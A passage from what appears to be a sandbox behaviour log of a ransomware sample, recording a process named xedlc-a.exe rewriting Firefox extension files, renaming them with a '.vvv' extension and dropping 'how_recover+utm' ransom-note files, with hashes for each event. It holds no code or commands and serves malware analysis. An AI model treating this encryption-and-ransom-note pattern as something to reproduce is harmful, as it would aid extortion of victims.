55916.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\xul-app.js
55917.          filesize: 4078
55918.          md5sum: e1b11f64a09be41239a6aadfb9af0c73
55919.          sha1sum: 84b4d7f62b63de7823873f5bbaa76ab188ed214b
55920.          processinfo:
55921.            pid: 1056
55922.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55923.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55924.            ads:
55925.          fid (ads:): 281474976765904
55926.          ntstatus: 0x0
55927.          CreateOptions: 0x0
55928.        file:
55929.          timestamp: 84555
55930.          mode: rename
55931.          sequenceNumber: 1360
55932.          filesize: 4078
55933.          md5sum: e1b11f64a09be41239a6aadfb9af0c73
55934.          sha1sum: 84b4d7f62b63de7823873f5bbaa76ab188ed214b
55935.          processinfo:
55936.            pid: 1056
55937.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55938.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55939.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\xul-app.js
55940.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\xul-app.js.vvv
55941.            ads:
55942.          fid (ads:): 281474976765904
55943.          ntstatus: 0x0
55944.          CreateOptions: 0x0
55945.        file:
55946.          timestamp: 84567
55947.          mode: created
55948.          sequenceNumber: 1361
55949.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\how_recover+utm.txt
55950.          processinfo:
55951.            pid: 1056
55952.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55953.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55954.            ads:
55955.          fid (ads:): 281474976778359
55956.          ntstatus: 0x0
55957.          CreateOptions: 0x60
55958.        file:
55959.          timestamp: 84575
55960.          mode: close
55961.          sequenceNumber: 1362
55962.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\how_recover+utm.txt
55963.          filesize: 2682
55964.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
55965.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
55966.          processinfo:
55967.            pid: 1056
55968.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55969.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55970.            ads:
55971.          fid (ads:): 281474976778359
55972.          ntstatus: 0x0
55973.          CreateOptions: 0x0
55974.        file:
55975.          timestamp: 84584
55976.          mode: created
55977.          sequenceNumber: 1363
55978.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\how_recover+utm.html
55979.          processinfo:
55980.            pid: 1056
55981.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55982.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55983.            ads:
55984.          fid (ads:): 281474976778360
55985.          ntstatus: 0x0
55986.          CreateOptions: 0x60
55987.        file:
55988.          timestamp: 84592
55989.          mode: close
55990.          sequenceNumber: 1364
55991.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\how_recover+utm.html
55992.          filesize: 9495
55993.          md5sum: 95f596a25dff51b6af2042b1bbe02985
55994.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
55995.          processinfo:
55996.            pid: 1056
55997.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55998.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55999.            ads:
56000.          fid (ads:): 281474976778360
56001.          ntstatus: 0x0
56002.          CreateOptions: 0x0
56003.        file:
56004.          timestamp: 84602
56005.          mode: created
56006.          sequenceNumber: 1365
56007.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-v1-0-data\how_recover+utm.txt
56008.          processinfo:
56009.            pid: 1056
56010.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56011.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56012.            ads:
56013.          fid (ads:): 281474976778361
56014.          ntstatus: 0x0
56015.          CreateOptions: 0x60
56016.        file:
56017.          timestamp: 84610
56018.          mode: close
56019.          sequenceNumber: 1366
56020.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-v1-0-data\how_recover+utm.txt
56021.          filesize: 2682
56022.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
56023.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
56024.          processinfo:
56025.            pid: 1056
56026.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56027.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56028.            ads:
56029.          fid (ads:): 281474976778361
56030.          ntstatus: 0x0
56031.          CreateOptions: 0x0
56032.        file:
56033.          timestamp: 84619
56034.          mode: created
56035.          sequenceNumber: 1367
56036.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-v1-0-data\how_recover+utm.html
56037.          processinfo:
56038.            pid: 1056
56039.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56040.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56041.            ads:
56042.          fid (ads:): 281474976778362
56043.          ntstatus: 0x0
56044.          CreateOptions: 0x60
56045.        file:
56046.          timestamp: 84628
56047.          mode: close
56048.          sequenceNumber: 1368
56049.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-v1-0-data\how_recover+utm.html
56050.          filesize: 9495
56051.          md5sum: 95f596a25dff51b6af2042b1bbe02985
56052.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
56053.          processinfo:
56054.            pid: 1056
56055.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56056.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56057.            ads:
56058.          fid (ads:): 281474976778362
56059.          ntstatus: 0x0
56060.          CreateOptions: 0x0
56061.        file:
56062.          timestamp: 84638
56063.          mode: open
56064.          sequenceNumber: 1369
56065.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-v1-0-lib\main.js
56066.          filesize: 2014
56067.          processinfo:
56068.            pid: 1056
56069.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56070.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56071.            ads:
56072.          fid (ads:): 562949953476257
56073.          ntstatus: 0x0
56074.          CreateOptions: 0x60
56075.        file:
56076.          timestamp: 84699
56077.          mode: close
56078.          sequenceNumber: 1370
56079.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-v1-0-lib\main.js
56080.          filesize: 2430
56081.          md5sum: e84ea4127a4bc5d39013e9709c9516de
56082.          sha1sum: 274cc265eb7e2400f251014fde50e6bc32e52501
56083.          processinfo:
56084.            pid: 1056
56085.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56086.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56087.            ads:
56088.          fid (ads:): 562949953476257
56089.          ntstatus: 0x0
56090.          CreateOptions: 0x0
56091.        file:
56092.          timestamp: 84711
56093.          mode: rename
56094.          sequenceNumber: 1371
56095.          filesize: 2430
56096.          md5sum: e84ea4127a4bc5d39013e9709c9516de
56097.          sha1sum: 274cc265eb7e2400f251014fde50e6bc32e52501
56098.          processinfo:
56099.            pid: 1056
56100.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56101.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56102.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-v1-0-lib\main.js
56103.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-v1-0-lib\main.js.vvv
56104.            ads:
56105.          fid (ads:): 562949953476257
56106.          ntstatus: 0x0
56107.          CreateOptions: 0x0
56108.        file:
56109.          timestamp: 84723
56110.          mode: created
56111.          sequenceNumber: 1372
56112.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-v1-0-lib\how_recover+utm.txt
56113.          processinfo:
56114.            pid: 1056
56115.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56116.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56117.            ads:
56118.          fid (ads:): 281474976778363
56119.          ntstatus: 0x0
56120.          CreateOptions: 0x60
56121.        file:
56122.          timestamp: 84732
56123.          mode: close
56124.          sequenceNumber: 1373
56125.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-v1-0-lib\how_recover+utm.txt
56126.          filesize: 2682
56127.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
56128.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
56129.          processinfo:
56130.            pid: 1056
56131.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56132.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56133.            ads:
56134.          fid (ads:): 281474976778363
56135.          ntstatus: 0x0
56136.          CreateOptions: 0x0
56137.        file:
56138.          timestamp: 84777
56139.          mode: created
56140.          sequenceNumber: 1374
56141.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-v1-0-lib\how_recover+utm.html
56142.          processinfo:
56143.            pid: 1056
56144.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56145.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56146.            ads:
56147.          fid (ads:): 281474976778364
56148.          ntstatus: 0x0
56149.          CreateOptions: 0x60
56150.        file:
56151.          timestamp: 84786
56152.          mode: close
56153.          sequenceNumber: 1375
56154.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-v1-0-lib\how_recover+utm.html
56155.          filesize: 9495
56156.          md5sum: 95f596a25dff51b6af2042b1bbe02985
56157.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
56158.          processinfo:
56159.            pid: 1056
56160.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56161.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56162.            ads:
56163.          fid (ads:): 281474976778364
56164.          ntstatus: 0x0
56165.          CreateOptions: 0x0
56166.        file:
56167.          timestamp: 84796
56168.          mode: open
56169.          sequenceNumber: 1376
56170.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-v1-0-tests\test-main.js
56171.          filesize: 764
56172.          processinfo:
56173.            pid: 1056
56174.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56175.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56176.            ads:
56177.          fid (ads:): 562949953476250
56178.          ntstatus: 0x0
56179.          CreateOptions: 0x60
56180.        file:
56181.          timestamp: 84805
56182.          mode: close
56183.          sequenceNumber: 1377
56184.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-v1-0-tests\test-main.js
56185.          filesize: 1182
56186.          md5sum: 291a6dd66b52bbf3b502b07d389d676b
56187.          sha1sum: 540705c148f61c0d1da9153bcdf9eb6c135b0fc6
56188.          processinfo:
56189.            pid: 1056
56190.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56191.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56192.            ads:
56193.          fid (ads:): 562949953476250
56194.          ntstatus: 0x0
56195.          CreateOptions: 0x0
56196.        file:
56197.          timestamp: 84817
56198.          mode: rename
56199.          sequenceNumber: 1378
56200.          filesize: 1182
56201.          md5sum: 291a6dd66b52bbf3b502b07d389d676b
56202.          sha1sum: 540705c148f61c0d1da9153bcdf9eb6c135b0fc6
56203.          processinfo:
56204.            pid: 1056
56205.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56206.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56207.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-v1-0-tests\test-main.js
56208.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-v1-0-tests\test-main.js.vvv
56209.            ads:
56210.          fid (ads:): 562949953476250
56211.          ntstatus: 0x0
56212.          CreateOptions: 0x0
56213.        file:
56214.          timestamp: 84829
56215.          mode: created
56216.          sequenceNumber: 1379
56217.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-v1-0-tests\how_recover+utm.txt
56218.          processinfo:
56219.            pid: 1056
56220.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56221.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56222.            ads:
56223.          fid (ads:): 281474976778365
56224.          ntstatus: 0x0
56225.          CreateOptions: 0x60
56226.        file:
56227.          timestamp: 84837
56228.          mode: close
56229.          sequenceNumber: 1380
56230.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-v1-0-tests\how_recover+utm.txt
56231.          filesize: 2682
56232.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
56233.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
56234.          processinfo:
56235.            pid: 1056
56236.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56237.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56238.            ads:
56239.          fid (ads:): 281474976778365
56240.          ntstatus: 0x0
56241.          CreateOptions: 0x0
56242.        file:
56243.          timestamp: 84858
56244.          mode: created
56245.          sequenceNumber: 1381
56246.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-v1-0-tests\how_recover+utm.html
56247.          processinfo:
56248.            pid: 1056
56249.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56250.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56251.            ads:
56252.          fid (ads:): 281474976778366
56253.          ntstatus: 0x0
56254.          CreateOptions: 0x60
56255.        file:
56256.          timestamp: 84867
56257.          mode: close
56258.          sequenceNumber: 1382
56259.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-v1-0-tests\how_recover+utm.html
56260.          filesize: 9495
56261.          md5sum: 95f596a25dff51b6af2042b1bbe02985
56262.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
56263.          processinfo:
56264.            pid: 1056
56265.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56266.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56267.            ads:
56268.          fid (ads:): 281474976778366
56269.          ntstatus: 0x0
56270.          CreateOptions: 0x0
56271.        file:
56272.          timestamp: 84876
56273.          mode: created
56274.          sequenceNumber: 1383
56275.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\how_recover+utm.txt
56276.          processinfo:
56277.            pid: 1056
56278.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56279.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56280.            ads:
56281.          fid (ads:): 281474976778367
56282.          ntstatus: 0x0
56283.          CreateOptions: 0x60
56284.        file:
56285.          timestamp: 84883
56286.          mode: close
56287.          sequenceNumber: 1384
56288.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\how_recover+utm.txt
56289.          filesize: 2682
56290.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
56291.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
56292.          processinfo:
56293.            pid: 1056
56294.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56295.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56296.            ads:
56297.          fid (ads:): 281474976778367
56298.          ntstatus: 0x0
56299.          CreateOptions: 0x0
56300.        file:
56301.          timestamp: 84891
56302.          mode: created
56303.          sequenceNumber: 1385
56304.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\how_recover+utm.html
56305.          processinfo:
56306.            pid: 1056
56307.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56308.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56309.            ads:
56310.          fid (ads:): 281474976778368
56311.          ntstatus: 0x0
56312.          CreateOptions: 0x60
56313.        file:
56314.          timestamp: 84898
56315.          mode: close
56316.          sequenceNumber: 1386
56317.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\how_recover+utm.html
56318.          filesize: 9495
56319.          md5sum: 95f596a25dff51b6af2042b1bbe02985
56320.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
56321.          processinfo:
56322.            pid: 1056
56323.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56324.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56325.            ads:
56326.          fid (ads:): 281474976778368
56327.          ntstatus: 0x0
56328.          CreateOptions: 0x0
56329.        file:
56330.          timestamp: 84907
56331.          mode: created
56332.          sequenceNumber: 1387
56333.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\how_recover+utm.txt
56334.          processinfo:
56335.            pid: 1056
56336.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56337.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56338.            ads:
56339.          fid (ads:): 281474976778369
56340.          ntstatus: 0x0
56341.          CreateOptions: 0x60
56342.        file:
56343.          timestamp: 84913
56344.          mode: close
56345.          sequenceNumber: 1388
56346.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\how_recover+utm.txt
56347.          filesize: 2682
56348.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
56349.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
56350.          processinfo:
56351.            pid: 1056
56352.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56353.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56354.            ads:
56355.          fid (ads:): 281474976778369
56356.          ntstatus: 0x0
56357.          CreateOptions: 0x0
56358.        file:
56359.          timestamp: 84921
56360.          mode: created
56361.          sequenceNumber: 1389
56362.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\how_recover+utm.html
56363.          processinfo:
56364.            pid: 1056
56365.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56366.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56367.            ads:
56368.          fid (ads:): 281474976778370
56369.          ntstatus: 0x0
56370.          CreateOptions: 0x60
56371.        file:
56372.          timestamp: 84928
56373.          mode: close
56374.          sequenceNumber: 1390
56375.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\how_recover+utm.html
56376.          filesize: 9495
56377.          md5sum: 95f596a25dff51b6af2042b1bbe02985
56378.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
56379.          processinfo:
56380.            pid: 1056
56381.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56382.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56383.            ads:
56384.          fid (ads:): 281474976778370
56385.          ntstatus: 0x0
56386.          CreateOptions: 0x0
56387.        file:
56388.          timestamp: 84937
56389.          mode: open
56390.          sequenceNumber: 1391
56391.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\bootstrap.js
56392.          filesize: 605
56393.          processinfo:
56394.            pid: 1056
56395.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56396.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56397.            ads:
56398.          fid (ads:): 562949953476215
56399.          ntstatus: 0x0
56400.          CreateOptions: 0x60
56401.        file:
56402.          timestamp: 84959
56403.          mode: close
56404.          sequenceNumber: 1392
56405.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\bootstrap.js
56406.          filesize: 1022
56407.          md5sum: b913116640df8332574795d0adee78de
56408.          sha1sum: 1e3f576b357cd12888687d6bdcb4b1a783fad34c
56409.          processinfo:
56410.            pid: 1056
56411.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56412.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56413.            ads:
56414.          fid (ads:): 562949953476215
56415.          ntstatus: 0x0
56416.          CreateOptions: 0x0
56417.        file:
56418.          timestamp: 84970
56419.          mode: rename
56420.          sequenceNumber: 1393
56421.          filesize: 1022
56422.          md5sum: b913116640df8332574795d0adee78de
56423.          sha1sum: 1e3f576b357cd12888687d6bdcb4b1a783fad34c
56424.          processinfo:
56425.            pid: 1056
56426.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56427.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56428.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\bootstrap.js
56429.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\bootstrap.js.vvv
56430.            ads:
56431.          fid (ads:): 562949953476215
56432.          ntstatus: 0x0
56433.          CreateOptions: 0x0
56434.        file:
56435.          timestamp: 84981
56436.          mode: open
56437.          sequenceNumber: 1394
56438.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\components\inlinedisposition.js
56439.          filesize: 3770
56440.          processinfo:
56441.            pid: 1056
56442.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56443.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56444.            ads:
56445.          fid (ads:): 562949953476218
56446.          ntstatus: 0x0
56447.          CreateOptions: 0x60
56448.        file:
56449.          timestamp: 85157
56450.          mode: close
56451.          sequenceNumber: 1395
56452.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\components\inlinedisposition.js
56453.          filesize: 4190
56454.          md5sum: af25b55db4ab05d800593cfb02532a01
56455.          sha1sum: 1b060c0d8c71d218508d6841cf3a03010917387b
56456.          processinfo:
56457.            pid: 1056
56458.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56459.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56460.            ads:
56461.          fid (ads:): 562949953476218
56462.          ntstatus: 0x0
56463.          CreateOptions: 0x0
56464.        file:
56465.          timestamp: 85230
56466.          mode: rename
56467.          sequenceNumber: 1396
56468.          filesize: 4190
56469.          md5sum: af25b55db4ab05d800593cfb02532a01
56470.          sha1sum: 1b060c0d8c71d218508d6841cf3a03010917387b
56471.          processinfo:
56472.            pid: 1056
56473.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56474.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56475.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\components\inlinedisposition.js
56476.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\components\inlinedisposition.js.vvv
56477.            ads:
56478.          fid (ads:): 562949953476218
56479.          ntstatus: 0x0
56480.          CreateOptions: 0x0
56481.        file:
56482.          timestamp: 85249
56483.          mode: created
56484.          sequenceNumber: 1397
56485.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\components\how_recover+utm.txt
56486.          processinfo:
56487.            pid: 1056
56488.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56489.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56490.            ads:
56491.          fid (ads:): 281474976778371
56492.          ntstatus: 0x0
56493.          CreateOptions: 0x60
56494.        file:
56495.          timestamp: 85262
56496.          mode: close
56497.          sequenceNumber: 1398
56498.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\components\how_recover+utm.txt
56499.          filesize: 2682
56500.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
56501.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
56502.          processinfo:
56503.            pid: 1056
56504.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
